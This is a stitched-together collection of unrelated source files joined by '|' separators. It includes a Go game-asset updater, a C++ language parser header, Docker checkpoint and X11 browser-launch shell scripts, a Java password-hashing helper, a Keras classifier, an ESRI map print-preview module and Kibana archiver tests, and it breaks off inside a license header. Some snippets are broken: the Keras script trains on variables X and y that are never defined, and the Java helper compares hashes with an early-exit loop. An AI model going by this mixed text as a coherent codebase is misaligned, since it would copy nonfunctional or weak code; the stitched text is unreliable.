<filename>internal/app/updateloop/submit_avg.go
package updateloop
import (
"context"
"strings"
"github.com/flandiayingman/arkwaifu/internal/app/avg"
"github.com/flandiayingman/arkwaifu/internal/pkg/arkres"
"github.com/flandiayingman/arkwaifu/internal/pkg/arkres/arkavg"
)
// submitAvg submits the AVG data of the given resource version to the AVG service.
// The AVG data is parsed from the corresponding resource directory.
//
// Note that submitting AVG data is a fully overwrite operation.
func (s *Service) submitAvg(ctx context.Context, resVer ResVersion) error {
resDir := s.ResDir(resVer)
a, err := getAvg(resDir)
if err != nil {
return err
}
err = s.AvgService.UpdateAvg(ctx, string(resVer), a)
if err != nil {
return err
}
return nil
}
// getAvg simply wraps arkavg.GetAvg, and convert the arkavg models to the AVG service models.
func getAvg(resDir string) (avg.Avg, error) {
r, err := arkavg.GetAvg(resDir, arkres.DefaultPrefix)
if err != nil {
return avg.Avg{}, err
}
a, err := avgFromRaw(&r, resDir)
if err != nil {
return avg.Avg{}, err
}
return a, nil
}
func avgFromRaw(ra *arkavg.Avg, resDir string) (avg.Avg, error) {
var a = make(avg.Avg, 0, len(ra.Groups)) // note that a.Avg is []a.Group
for _, rg := range ra.Groups {
group, err := groupFromRaw(&rg, resDir)
if err != nil {
return nil, err
}
a = append(a, group)
}
return a, nil
}
func groupFromRaw(rg *arkavg.Group, resDir string) (avg.Group, error) {
var stories = make([]avg.Story, 0, len(rg.Stories))
for _, rs := range rg.Stories {
story, err := storyFromRaw(&rs, resDir)
if err != nil {
return avg.Group{}, err
}
stories = append(stories, story)
}
return avg.Group{
ID: rg.ID,
Name: rg.Name,
Type: string(rg.Type),
Stories: stories,
}, nil
}
func storyFromRaw(rs *arkavg.Story, resDir string) (avg.Story, error) {
rawAssets, err := arkavg.GetStoryAssets(resDir, arkres.DefaultPrefix, *rs)
if err != nil {
return avg.Story{}, err
}
var assets = make([]avg.Asset, 0, len(rawAssets))
for _, ra := range rawAssets {
asset := assetFromRaw(&ra)
assets = append(assets, asset)
}
return avg.Story{
ID: rs.ID,
Code: rs.Code,
Name: rs.Name,
Tag: string(rs.Tag),
GroupID: rs.GroupID,
Assets: assets,
}, nil
}
func assetFromRaw(ra *arkavg.Asset) avg.Asset {
return avg.Asset{
Name: strings.ToLower(ra.Name),
Kind: string(ra.Kind),
}
}
|
#!/bin/bash
export LIBRARY_LICENSES="./mygui/COPYING.MIT"
export LIBRARY_COPY_TO_LIB="$pfx/lib/*.so*"
|
import XCTest
class CustomTestCase: XCTestCase {
override func setUp() {
// Perform any necessary setup operations here
}
override func tearDown() {
// Perform any necessary teardown operations here
}
} |
import base64
string = "Hello World!"
data_bytes = string.encode('ascii')
encoded_string = base64.b64encode(data_bytes)
print(encoded_string) |
<gh_stars>0
//===--- Parser.hpp - Sora Language Parser ----------------------*- C++ -*-===//
// Part of the Sora project, licensed under the MIT license.
// See LICENSE.txt in the project root for license information.
//
// Copyright (c) 2019 <NAME>
//===----------------------------------------------------------------------===//
#pragma once
#include "Sora/AST/Decl.hpp"
#include "Sora/AST/OperatorKinds.hpp"
#include "Sora/Common/LLVM.hpp"
#include "Sora/Diagnostics/DiagnosticEngine.hpp"
#include "Sora/Diagnostics/DiagnosticsParser.hpp"
#include "Sora/Lexer/Lexer.hpp"
#include "Sora/Parser/ParserResult.hpp"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/STLExtras.h"
#include "llvm/Support/SaveAndRestore.h"
#include <functional>
namespace sora {
class ASTContext;
class BlockStmt;
class Expr;
class Identifier;
class Lexer;
class LetDecl;
class Pattern;
class SourceFile;
class StmtCondition;
class TypeRepr;
/// Sora Language Parser
///
/// Note: Parsing method should return nullptr when they fail to parse
/// something and can't recover, and return a value when they successfully
/// recovered. They can also use makeParserErrorResult to create a result
/// with an error bit set to tell the caller that an error occured but
/// we successfully recovered.
/// Alternatively, parsing methods can also use makeParserResult(false, node)
/// to create an error parser result with a value. This can be used to notify
/// the caller that something went wrong during the parsing but it recovered
/// successfully and thus parsing can continue.
class Parser final {
Parser(const Parser &) = delete;
Parser &operator=(const Parser &) = delete;
public:
/// \param sf the SourceFile that this parser will be working on.
/// Its ASTContext, DiagnosticEngine and SourceManager will be used to
/// allocate memory, emit diagnostics and access the file's text.
Parser(SourceFile &file);
/// The ASTContext
ASTContext &ctxt;
/// The Diagnostic Engine
DiagnosticEngine &diagEng;
/// The SourceFile that this parser is working on
SourceFile &sourceFile;
private:
/// The current DeclContext
DeclContext *declContext = nullptr;
/// Our lexer instance
Lexer lexer;
/// The current token being considered by the parser
Token tok;
/// The SourceLoc that's right past-the-end of the last token consumed by the
/// parser.
SourceLoc prevTokPastTheEnd;
/// Whether we can apply the "mut" specifier when parsing a pattern.
bool canApplyMutSpecifier = true;
public:
//===- Source-File Parsing ----------------------------------------------===//
/// Parses a source-file
void parseSourceFile();
//===- Declaration Parsing ----------------------------------------------===//
/// \returns true if the parser is positioned at the start of a declaration.
bool isStartOfDecl() const;
/// Parses a declaration or top-level-declaration.
/// \param isTopLevel if true, only top-level-declarations are allowed, and
/// declarations that can't appear at the top level are diagnosed.
///
/// isStartOfDecl() must return true.
ParserResult<Decl> parseDecl(bool isTopLevel = false);
/// Parses a let-declaration
/// The parser must be positioned on the "let" keyword.
ParserResult<LetDecl> parseLetDecl();
/// Parses a parameter-declaration
/// The parser must be positioned on the identifier.
ParserResult<ParamDecl> parseParamDecl();
/// Parses a parameter-declaration-list
/// The parser must be positioned on the "("
ParserResult<ParamList> parseParamDeclList();
/// Parses a function-declaration.
/// The parser must be positioned on the "func" keyword.
ParserResult<FuncDecl> parseFuncDecl();
//===- Expression Parsing -----------------------------------------------===//
/// Parses an expression
ParserResult<Expr> parseExpr(llvm::function_ref<void()> onNoExpr);
/// Parses an assignement-expression
ParserResult<Expr> parseAssignementExpr(llvm::function_ref<void()> onNoExpr);
/// Consumes an assignement-operator
/// \param result the operator that was found. Will not be changed if no
/// operator was found.
/// \returns SourceLoc() if not found.
SourceLoc consumeAssignementOperator(BinaryOperatorKind &result);
/// Parses a conditional-expression
ParserResult<Expr> parseConditionalExpr(llvm::function_ref<void()> onNoExpr);
/// Binary operator precedences, from highest (0) to lowest (last).
enum class PrecedenceKind : uint8_t {
/// Multiplicative Operators: * / %
Multiplicative = 0,
/// Shift operators: << >>
Shift,
/// Bitwise operators: | ^ &
Bitwise,
/// Additive operators: + -
Additive,
/// Relational operators: == != < <= > >=
Relational,
/// Logical operators: && ||
Logical,
/// Null-Coalescing operator: ??
NullCoalesce,
HighestPrecedence = Multiplicative,
LowestPrecedence = NullCoalesce
};
/// Parses a binary-expression.
///
/// NOTE: This uses precedence-climbing (lowest to highest) in order to
/// respect operator precedences, and \p precedence will be the "starting"
/// precedence (usually it's LowestPrecedence).
ParserResult<Expr>
parseBinaryExpr(llvm::function_ref<void()> onNoExpr,
PrecedenceKind precedence = PrecedenceKind::LowestPrecedence);
/// Consumes an binary-operator
/// \param result the operator that was found. Will not be changed if no
/// operator was found.
/// \returns SourceLoc() if not found
///
/// Note that some binary operators will be ignored when they're at the start
/// of a line, because they can be confused with unary operators. e.g. +
SourceLoc consumeBinaryOperator(BinaryOperatorKind &result,
PrecedenceKind precedence);
/// Parses a cast-expression
ParserResult<Expr> parseCastExpr(llvm::function_ref<void()> onNoExpr);
/// Parses a prefix-expression
ParserResult<Expr> parsePrefixExpr(llvm::function_ref<void()> onNoExpr);
/// Consumes a prefix-operator
/// \param result the operator that was found. Will not be changed if no
/// operator was found.
/// \returns SourceLoc() if not found.
SourceLoc consumePrefixOperator(UnaryOperatorKind &result);
/// Parses a postfix-expression
ParserResult<Expr> parsePostfixExpr(llvm::function_ref<void()> onNoExpr);
/// Parses a member-access on \p base (a suffix).
/// The parser must be positioned on the '.' or '->'
ParserResult<Expr> parseMemberAccessExpr(Expr *base);
/// Parses a primary-expression
ParserResult<Expr> parsePrimaryExpr(llvm::function_ref<void()> onNoExpr);
/// Parses a tuple-expression, returning a TupleExpr/ParenExpr on success.
/// The parser must be positioned on the '('.
ParserResult<Expr> parseTupleExpr();
/// Parses a tuple-expression.
/// The parser must be positioned on the '('.
bool parseTupleExpr(SourceLoc &lParenLoc, SmallVectorImpl<Expr *> &exprs,
SourceLoc &rParenLoc);
//===- Pattern Parsing --------------------------------------------------===//
/// Parses a pattern
ParserResult<Pattern> parsePattern(llvm::function_ref<void()> onNoPat);
/// Parses a tuple-pattern.
/// The parse must be positioned on the '('
ParserResult<Pattern> parseTuplePattern();
//===- Statement Parsing ------------------------------------------------===//
/// \returns true if the parser is positioned at the start of a statement.
bool isStartOfStmt() const;
/// Parses a statement.
/// isStartOfStmt() must return true.
ParserResult<Stmt> parseStmt();
/// Parses a block-statement
/// The parser must be positioned on the "{"
ParserResult<BlockStmt> parseBlockStmt();
/// Parses a return-statement
/// The parser must be positioned on the 'return' keyword.
ParserResult<Stmt> parseReturnStmt();
/// Parses a if-statement.
/// The parser must be positioned on the 'if' keyword.
ParserResult<Stmt> parseIfStmt();
/// Parses a while-statement.
/// The parser must be positioned on the 'while' keyword.
ParserResult<Stmt> parseWhileStmt();
// Parses a condition
/// \param cond where the result will be stored
/// \param name the name of the condition (for diagnostics), e.g. "if".
/// \returns true if no parsing error occured, false otherwise.
bool parseCondition(StmtCondition &cond, StringRef name);
//===- Type Parsing -----------------------------------------------------===//
/// Parses a type. Calls \p onNoType if no type was found.
ParserResult<TypeRepr> parseType(llvm::function_ref<void()> onNoType);
/// Parses a tuple type.
/// The parser must be positioned on the "("
ParserResult<TypeRepr> parseTupleType();
/// Parses a reference type.
/// The parser must be positioned on the "&".
ParserResult<TypeRepr> parseReferenceType();
/// Parses a "maybe" type
/// The parser must be positioned on the "maybe" keyword.
ParserResult<TypeRepr> parseMaybeType();
//===- Other Parsing Utilities ------------------------------------------===//
/// Parses a matching token (parentheses or square/curly brackets).
/// Emits a diagnostic and a note if the token is not found.
/// \param the SourceLoc of the left matching token
/// \param the kind of the right matching token (RParen, RCurly or RSquare)
/// \param customErr if a custom diagnostic is provided, it'll be used
/// instead of the default error message.
/// \returns a valid SourceLoc on success, and invalid one on failure.
SourceLoc parseMatchingToken(SourceLoc lLoc, TokenKind kind,
Optional<TypedDiag<>> customErr = None);
/// Parses a comma-separated list of values.
///
/// \param callBack The element parsing function. Returns a boolean indicating
/// whether parsing should continue. It takes a single argument which is the
/// position of the element we're parsing.
///
/// The callback is always called at least once.
void parseList(llvm::function_ref<bool(size_t)> callback);
/// Parses a comma-separated list of values inside a parentheses.
/// The parser must be positioned on the '('
///
/// \param rParenloc If found, the SourceLoc of the ')' will be stored in this
/// variable. If not found, this is set to prevTokPastTheEnd.
/// \param callBack The element parsing function. Returns
/// true on success, false on parsing error. The callback is not called when
/// the next token is a ')', so you don't need to handle ')' in the callback.
/// \param missingRParenDiag passed to parseMatchingToken
///
/// \returns true on success, false on failure.
bool parseTuple(SourceLoc &rParenLoc,
llvm::function_ref<bool(size_t)> callback,
Optional<TypedDiag<>> missingRParenDiag = None);
//===- Diagnostic Emission ----------------------------------------------===//
/// Emits a diagnostic at \p tok's location.
template <typename... Args>
InFlightDiagnostic
diagnose(const Token &tok, const TypedDiag<Args...> &diag,
typename detail::PassArgument<Args>::type... args) {
return diagnose(tok.getLoc(), diag, args...);
}
/// Emits a diagnostic at \p loc
template <typename... Args>
InFlightDiagnostic
diagnose(SourceLoc loc, const TypedDiag<Args...> &diag,
typename detail::PassArgument<Args>::type... args) {
assert(loc && "Parser can't emit diagnostics without SourceLocs");
return diagEng.diagnose<Args...>(loc, diag, args...);
}
/// Emits a "expected" diagnostic.
/// The diagnostic points at the beginning of the current token, or, if it's
/// at the beginning of a line, right past the end of the previous token
/// consumed by the parser.
template <typename... Args>
InFlightDiagnostic
diagnoseExpected(const TypedDiag<Args...> &diag,
typename detail::PassArgument<Args>::type... args) {
SourceLoc loc;
if (tok.isAtStartOfLine() && prevTokPastTheEnd)
loc = prevTokPastTheEnd;
else
loc = tok.getLoc();
assert(loc && "loc is null?");
return diagEng.diagnose<Args...>(loc, diag, args...);
}
//===- Current DeclContext Management -----------------------------------===//
/// Sets the DeclContext that will be used by the parser.
/// \returns a RAII object that restores the previous DeclContext on
/// destruction.
llvm::SaveAndRestore<DeclContext *> setDeclContextRAII(DeclContext *newDC) {
return {declContext, newDC};
}
/// \returns the current DeclContext used by the parser
DeclContext *getDeclContext() const { return declContext; }
//===- Token Consumption & Peeking --------------------------------------===//
/// Peeks the next token
const Token &peek() const;
/// Consumes the current token, replacing it with the next one.
/// \returns the SourceLoc of the consumed token.
SourceLoc consumeToken();
/// Consumes the current token, replacing it with the next one.
/// This check that the current token's kind is equal to \p kind
/// \returns the SourceLoc of the consumed token.
SourceLoc consume(TokenKind kind) {
assert(tok.getKind() == kind && "Wrong kind!");
return consumeToken();
}
/// Consumes an identifier, putting the result in \p identifier and returning
/// its SourceLoc.
SourceLoc consumeIdentifier(Identifier &identifier);
/// Consumes the current token if its kind is equal to \p kind
/// \returns the SourceLoc of the consumed token, or SourceLoc() if no token
/// was consumed.
SourceLoc consumeIf(TokenKind kind) {
if (tok.is(kind))
return consumeToken();
return SourceLoc();
}
//===- Recovery ---------------------------------------------------------===//
// NOTE: All of those methods will also stop at the EOF token.
//===--------------------------------------------------------------------===//
/// Skips the current token, matching parentheses.
/// (e.g. if the current token is {, this skips until past the next })
void skip();
/// Skips until the next token of kind \p kind without consuming it.
void skipUntil(TokenKind kind);
/// Skips to the next Decl
void skipUntilDecl();
/// Skips until the next tok or newline.
void skipUntilTokOrNewline(TokenKind tok = TokenKind::Invalid);
/// Skips to the next \p tok, Decl or }
void skipUntilTokDeclRCurly(TokenKind tok = TokenKind::Invalid);
/// Skips to the next \p tok, Decl, Stmt or }
void skipUntilTokDeclStmtRCurly(TokenKind tok = TokenKind::Invalid);
//===- Miscellaneous ----------------------------------------------------===//
/// \returns true if the parser has reached EOF
bool isEOF() const { return tok.is(TokenKind::EndOfFile); }
/// \returns an identifier object for the contents (string) of \p tok
Identifier getIdentifier(const Token &tok);
/// \returns the difference between the column number of a and b.
/// e.g if a is column 5, and b is column 4, returns -1.
int getColumnDifference(SourceLoc a, SourceLoc b) const;
};
} // namespace sora |
#!/bin/bash
set -eux
docker run -d --name looper --security-opt seccomp:unconfined busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done'
# wait for a while
sleep 5
docker logs looper
# run criu checkpoint to save the state
docker checkpoint create --checkpoint-dir=/tmp looper checkpoint
# restore as a new container
docker create --name looper-clone --security-opt seccomp:unconfined busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done'
docker start --checkpoint-dir=/tmp --checkpoint=checkpoint looper-clone
sleep 5
docker logs looper-clone
docker rm -f looper looper-clone || true
|
function zle-line-init zle-keymap-select {
PROMPT=`@PURS@/bin/purs prompt -k "$KEYMAP" -r "$?" --venv "${${VIRTUAL_ENV:t}%-*}"`
zle reset-prompt
}
zle -N zle-line-init
zle -N zle-keymap-select
autoload -Uz add-zsh-hook
function _prompt_purs_precmd() {
@PURS@/bin/purs precmd
}
add-zsh-hook precmd _prompt_purs_precmd
|
#!/bin/bash
runx() {
XAUTHORITY=/tmp/auth "$@"
}
cp /tmp/.docker.xauth /tmp/auth
runx xauth add ${HOSTNAME}/unix${DISPLAY} . $(runx xauth list | awk '$1 !~ /localhost/ {print $3; exit}')
runx xauth generate $DISPLAY . untrusted timeout 0
/usr/local/bin/warsaw/core \
&& runx firefox -no-remote -private-window --class BB --name BB https://www.bancobrasil.com.br/aapf/login.html
|
def create_anagrams(word):
if len(word) <= 1:
return [word]
else:
anagrams = []
for i, letter in enumerate(word):
for j in create_anagrams(word[:i]+word[i+1:]):
anagrams.append(letter + j)
return anagrams |
#!/bin/bash
$HADOOP_HOME/sbin/stop-all.sh
# echo -e "\n"
# $HADOOP_HOME/sbin/stop-dfs.sh
# echo -e "\n"
# $HADOOP_HOME/sbin/stop-yarn.sh
# echo -e "\n"
|
<filename>ProjetOeuvreSpingBoot/src/main/java/com/epul/oeuvre/utilitaires/MonMotPassHash.java
package com.epul.oeuvre.utilitaires;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import java.nio.charset.Charset;
import java.nio.charset.StandardCharsets;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.security.spec.InvalidKeySpecException;
import java.util.Base64;
import java.util.Random;
public class MonMotPassHash
{
private static final int SaltSize = 32;
private static final Random RANDOM = new SecureRandom();
private static final int ITERATIONS = 10000;
private static final int KEY_LENGTH = 128;
/// <summary>
/// Génère le sel sous forme d'une clé
/// </summary>
/// <returns></returns>
public static byte[] GenerateSalt()
{
byte[] salt = new byte[SaltSize];
RANDOM.nextBytes(salt);
return salt;
}
/**
* On retourne un mot de passe haché.<br>
* erreur : le mot de passe est détruit (le char[] est rempli de zéros)
*
* @param password le mot de passe en clair
* @param salt le sel généré
*
* @retourne un mot de passe avec un sel
*/
public static byte[] generatePasswordHash(char[] password, byte[] salt) {
PBEKeySpec spec = new PBEKeySpec(password, salt, ITERATIONS, KEY_LENGTH);
//Arrays.fill(password, Character.MIN_VALUE);
try {
// génère une clé keyFactory en utilisant l'algorithme PDBKDF2WithHmacSHA1
SecretKeyFactory skf = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
return skf.generateSecret(spec).getEncoded();
} catch (NoSuchAlgorithmException | InvalidKeySpecException e) {
throw new AssertionError("Error while hashing a password: " + e.getMessage(), e);
} finally {
spec.clearPassword();
}
}
/**
* retourne true si les passwors sont identiques .<br>
* erreur : le mot de passe est détruit (le char[] est rempli de zéros)
*
* @param pwdCO le mot de passe à contrôler
* @param pwdh le mot de passe stocké
*
* @return true si tout concorde
*/
public static boolean verifyPassword( byte[] pwdCO, byte[] pwdh) {
// Arrays.fill(password, Character.MIN_VALUE);
if (pwdCO.length != pwdh.length) return false;
for (int i = 0; i < pwdCO.length; i++) {
if (pwdCO[i] != pwdh[i]) return false;
}
return true;
}
/// <summary>
/// Cette méthode transforme une chaîne de caractère en bytes
/// </summary>
public static byte[] transformeEnBytes(String maChaine)
{
Charset charset = StandardCharsets.US_ASCII;
byte[] bytes = Base64.getDecoder().decode(maChaine);
return bytes;
}
/// <summary>
/// Cette méthode transforme une tableau bytes en chaîne
/// </summary>
public static String bytesToString(byte[] monByte)
{
String str = Base64.getEncoder().encodeToString(monByte);
return str;
}
public static char[] converttoCharArray( String maChaine)
{
char[] mesChar = maChaine.toCharArray();
/*char[] mesChar = new char[maChaine.length()];
for (int i =0; i< maChaine.length(); i++)
{
mesChar[i]= maChaine.charAt(i);
}*/
return mesChar;
}
}
|
from typing import List, Dict
def count_one_letter_words(words: List[str]) -> Dict[str, int]:
letter_count = {}
for word in words:
letter = word.strip() # Remove leading and trailing spaces
if letter in letter_count:
letter_count[letter] += 1
else:
letter_count[letter] = 1
return letter_count |
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.optimizers import SGD
import numpy as np
# Define number of features
num_features = 7
# Define flower categories
flower_categories = 3
# Create a neural network model
model = Sequential()
# Input layer with num_features nodes
model.add(Dense(num_features, input_dim=num_features))
model.add(Activation('relu'))
# Adding two hidden layers with 8 and 4 neurons
model.add(Dense(8))
model.add(Activation('relu'))
model.add(Dense(4))
model.add(Activation('relu'))
# Output layer with flower_categories nodes
model.add(Dense(flower_categories))
model.add(Activation('softmax'))
# Setting an sgd optimizer
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy')
# Train the model
model.fit(X, y, batch_size=128, epochs=200) |
/*
* Copyright (C) 2020 con terra GmbH (<EMAIL>)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import Polygon from "esri/geometry/Polygon";
import Graphic from "esri/Graphic";
import * as geometryEngine from "esri/geometry/geometryEngine";
import geometry from "ct/mapping/geometry";
import GraphicsLayer from "esri/layers/GraphicsLayer";
import SketchViewModel from "esri/widgets/Sketch/SketchViewModel";
import LayoutHelper from "./LayoutHelper";
const _geometry = Symbol("_geometry");
const _graphic = Symbol("_graphic");
const _graphicsLayer = Symbol("_graphicsLayer");
const _sketchViewModel = Symbol("_sketchViewModel");
export default class PrintingPreviewDrawer {
activate() {
const mapWidgetModel = this._mapWidgetModel;
if (mapWidgetModel.map) {
this._addGraphicsLayerToMap(mapWidgetModel.map);
} else {
mapWidgetModel.watch("map", ({value: map}) => {
this._addGraphicsLayerToMap(map);
});
}
this[_geometry] = null;
}
deactivate() {
const mapWidgetModel = this._mapWidgetModel;
const map = mapWidgetModel.map;
this._removeGraphicsLayerFromMap(map);
}
drawTemplateDimensions(printInfos, templateOptions, defaultPageUnit) {
const mapWidgetModel = this._mapWidgetModel;
if (!printInfos.templateInfos) {
return;
}
const printSize = this._getPrintSize(printInfos, templateOptions, defaultPageUnit);
if (!printSize) {
return;
}
const width = printSize.width;
const height = printSize.height;
const geometryParams = {
width: width,
height: height,
rotation: mapWidgetModel.rotation
};
const geometry = this._getMainFrameGeometry(geometryParams);
this.removeGraphicFromGraphicsLayer();
this._addGraphicToGraphicsLayer(geometry);
return geometry;
}
_getPrintSize(printInfos, templateOptions, defaultPageUnit) {
const printSize = {};
let templateWidth;
let templateHeight;
const printScale = templateOptions.scale;
const dpi = templateOptions.dpi;
const mapWidgetModel = this._mapWidgetModel;
const spatialReference = mapWidgetModel.spatialReference;
// get templateinfo
const templateInfos = printInfos.templateInfos;
const layout = templateOptions.layout;
if (!layout || layout && layout === "MAP_ONLY") {
const resolution = geometry.calcPixelResolutionAtScale(printScale, spatialReference, dpi);
templateWidth = templateOptions.width;
templateHeight = templateOptions.height;
printSize.width = (templateWidth * resolution);
printSize.height = (templateHeight * resolution);
} else {
const templateInfo = templateInfos.find((templateInfo) => {
const layoutName = templateInfo.layoutTemplate;
const currentLayoutName = LayoutHelper.getLayoutName(layout);
return layoutName === currentLayoutName;
});
if (!templateInfo) {
return null;
}
const frameSize = templateInfo.activeDataFrameSize || templateInfo.webMapFrameSize;
templateWidth = frameSize[0];
templateHeight = frameSize[1];
// currently only meter is supported
const templateUnit = templateInfo.pageUnits || defaultPageUnit;
printSize.width = this._convertTemplateSizeTo(templateWidth, printScale, templateUnit);
printSize.height = this._convertTemplateSizeTo(templateHeight, printScale, templateUnit);
}
return printSize;
}
_convertTemplateSizeTo(value, scale, unit) {
const coordinateTransformer = this._coordinateTransformer;
//let spatialRederence = this._mapWidgetModel && this._mapWidgetModel.spatialReference;
//let wkid = spatialRederence && spatialRederence.wkid || spatialRederence.latestWkid;
let factor;
switch (unit) {
case "MILLIMETER":
factor = 1000;
break;
case "CENTIMETER":
factor = 100;
break;
case "INCH":
factor = 39.3701;
break;
}
return value * scale / factor;
}
_getMainFrameGeometry(geometryParams) {
const mapWidgetModel = this._mapWidgetModel;
const view = mapWidgetModel.view;
const centerPoint = mapWidgetModel.center;
const x = centerPoint.x;
const y = centerPoint.y;
const halfWidth = geometryParams.width / 2;
const halfHeight = geometryParams.height / 2;
const rings = [
[x - halfWidth, y - halfHeight],
[x + halfWidth, y - halfHeight],
[x + halfWidth, y + halfHeight],
[x - halfWidth, y + halfHeight],
[x - halfWidth, y - halfHeight]
];
const polygon = new Polygon({
rings: rings,
spatialReference: view.spatialReference
});
return geometryEngine.rotate(polygon, geometryParams.rotation);
}
_addGraphicsLayerToMap(map) {
const mapWidgetModel = this._mapWidgetModel;
const graphicsLayer = this[_graphicsLayer] = new GraphicsLayer({
listMode: "hide"
});
map.add(graphicsLayer);
const properties = this._printingEnhancedProperties;
if (!properties.enablePrintPreviewMovement) {
return;
}
if (mapWidgetModel.view) {
this._createSketchViewModel(graphicsLayer, mapWidgetModel.view);
} else {
mapWidgetModel.watch("view", ({value: view}) => {
this._createSketchViewModel(graphicsLayer, view);
});
}
}
_removeGraphicsLayerFromMap(map) {
map.remove(this[_graphicsLayer]);
}
_createSketchViewModel(graphicsLayer, view) {
const sketchViewModel = this[_sketchViewModel] = new SketchViewModel({
view: view,
layer: graphicsLayer,
updateOnGraphicClick: true,
defaultUpdateOptions: {
toggleToolOnClick: false,
enableRotation: true,
enableScaling: false,
multipleSelectionEnabled: false
}
});
sketchViewModel.on("update", (event) => {
const graphics = event.graphics;
if (graphics.length) {
const graphic = graphics[0];
const geometry = graphic.geometry;
this[_geometry] = geometry;
this._eventService.postEvent("dn_printingenhanced/PRINTSETTINGS", {geometry: geometry});
}
});
}
_addGraphicToGraphicsLayer(geometry) {
const properties = this._printingEnhancedProperties;
const symbol = properties.printingPreviewSymbol;
const graphic = this[_graphic] = new Graphic({
geometry: geometry,
symbol: symbol
});
this[_graphicsLayer].add(graphic);
if (properties.enablePrintPreviewMovement) {
this._eventService.postEvent("dn_printingenhanced/PRINTSETTINGS", {geometry: graphic.geometry});
}
}
removeGraphicFromGraphicsLayer() {
if (this[_graphic]) {
this[_graphicsLayer].remove(this[_graphic]);
}
this._completeSketching();
}
_completeSketching() {
const sketchViewModel = this[_sketchViewModel];
sketchViewModel && sketchViewModel.complete();
}
showGraphicsLayer(value) {
this[_graphicsLayer].visible = value;
this._completeSketching();
}
}
|
<filename>src/es_archiver/lib/docs/__tests__/index_doc_records_stream.js
/*
* Licensed to Elasticsearch B.V. under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch B.V. licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import expect from '@kbn/expect';
import { delay } from 'bluebird';
import { createListStream, createPromiseFromStreams } from '../../../../legacy/utils';
import { Progress } from '../../progress';
import { createIndexDocRecordsStream } from '../index_doc_records_stream';
import { createStubStats, createStubClient, createPersonDocRecords } from './stubs';
const recordsToBulkBody = records => {
return records.reduce((acc, record) => {
const { index, type, id, source } = record.value;
return [...acc, { index: { _index: index, _type: type, _id: id } }, source];
}, []);
};
describe('esArchiver: createIndexDocRecordsStream()', () => {
it('consumes doc records and sends to `_bulk` api', async () => {
const records = createPersonDocRecords(1);
const client = createStubClient([
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records),
});
return { ok: true };
},
]);
const stats = createStubStats();
const progress = new Progress();
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(1);
expect(progress.getTotal()).to.be(undefined);
});
it('consumes multiple doc records and sends to `_bulk` api together', async () => {
const records = createPersonDocRecords(10);
const client = createStubClient([
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records.slice(0, 1)),
});
return { ok: true };
},
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records.slice(1)),
});
return { ok: true };
},
]);
const stats = createStubStats();
const progress = new Progress();
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(10);
expect(progress.getTotal()).to.be(undefined);
});
it('waits until request is complete before sending more', async () => {
const records = createPersonDocRecords(10);
const stats = createStubStats();
const start = Date.now();
const delayMs = 1234;
const client = createStubClient([
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records.slice(0, 1)),
});
await delay(delayMs);
return { ok: true };
},
async (name, params) => {
expect(name).to.be('bulk');
expect(params).to.eql({
body: recordsToBulkBody(records.slice(1)),
});
expect(Date.now() - start).to.not.be.lessThan(delayMs);
return { ok: true };
},
]);
const progress = new Progress();
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(10);
expect(progress.getTotal()).to.be(undefined);
});
it('sends a maximum of 300 documents at a time', async () => {
const records = createPersonDocRecords(301);
const stats = createStubStats();
const client = createStubClient([
async (name, params) => {
expect(name).to.be('bulk');
expect(params.body.length).to.eql(1 * 2);
return { ok: true };
},
async (name, params) => {
expect(name).to.be('bulk');
expect(params.body.length).to.eql(299 * 2);
return { ok: true };
},
async (name, params) => {
expect(name).to.be('bulk');
expect(params.body.length).to.eql(1 * 2);
return { ok: true };
},
]);
const progress = new Progress();
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(301);
expect(progress.getTotal()).to.be(undefined);
});
it('emits an error if any request fails', async () => {
const records = createPersonDocRecords(2);
const stats = createStubStats();
const client = createStubClient([
async () => ({ ok: true }),
async () => ({ errors: true, forcedError: true }),
]);
const progress = new Progress();
try {
await createPromiseFromStreams([
createListStream(records),
createIndexDocRecordsStream(client, stats, progress),
]);
throw new Error('expected stream to emit error');
} catch (err) {
expect(err.message).to.match(/"forcedError":\s*true/);
}
client.assertNoPendingResponses();
expect(progress.getComplete()).to.be(1);
expect(progress.getTotal()).to.be(undefined);
});
});
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
